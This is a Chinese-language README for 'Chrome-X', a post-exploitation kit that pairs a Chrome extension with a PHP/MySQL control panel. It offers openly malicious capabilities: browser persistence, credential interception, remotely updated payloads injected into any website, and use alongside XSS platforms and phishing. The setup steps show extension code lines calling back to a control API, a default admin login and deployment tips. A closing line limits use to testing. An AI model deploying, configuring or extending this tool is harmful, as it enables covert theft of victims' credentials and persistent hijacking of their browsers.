Chrome-X 是一个用于后渗透持久化与票据监听的平台。
- 👥 每个插件用户可设置唯一值,以防接口暴漏被爆破
- 📊 后台可远程更新payload
- ⚙️ 实现持久化与凭据监听
- 🔒 自定义payload可实现不同场景需求
- 📱 可实现植入任何网站
- PHP 7.4 或更高版本
- MySQL 5.7 或更高版本
-
background.js文件修改
修改3和4行为用户的用户名和盐
const USERNAME = 'test'; const SALT = '666';
第19行 修改API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}`
-
content.js文件修改
修改第64行API
const response = await fetch(`https://127.0.0.1/api/getuser.php?hash=${hash}`, {
-
建议部署在宝塔 给所有文件权限 否则生成sessions会报错
-
配置数据库文件 /config/config.php
-
记得配置https 这是非常重要的 不然会导致https的站点无法生效
// MySQL数据库配置 define('DB_HOST', 'localhost'); define('DB_NAME', 'chrome_x'); define('DB_USER', 'chrome_x'); define('DB_PASS', 'chrome_x'); define('DB_CHARSET', 'utf8mb4');
- 访问
http://your-domain/ - 默认管理员账号:admin 密码:admin_hack 【修改密码请到数据库和create_admin.php 第九行 手动修改 或者下个版本修复问题】
- 首页添加用户 用户名和盐必须和插件的一致
- 设置payload 其他玩法自行发掘 如:XSS平台等
- 用户过多分辨不清 可添加备注
- 测试持久化劫持与凭据获取
- 检查用户名和密码是否正确
- 确认数据库连接是否正常
- 检查是否给了文件权限 因为sessions需要生成文件
- 此功能是个bug 或在下个版本修复
- 请进入数据库和create_admin.php 第九行 手动修改
- XSS
- 钓鱼
- 获取到PC权限后想进行后渗透和持久化凭据劫持,利用安装Chrome插件和控制端配置,可远程修改payload,凭据劫持配合XSS平台使用。
https://github.com/0xShe/Chrome-X
本程序只允许测试使用,禁止用于违法犯罪活动,否则一切后果将自行承担。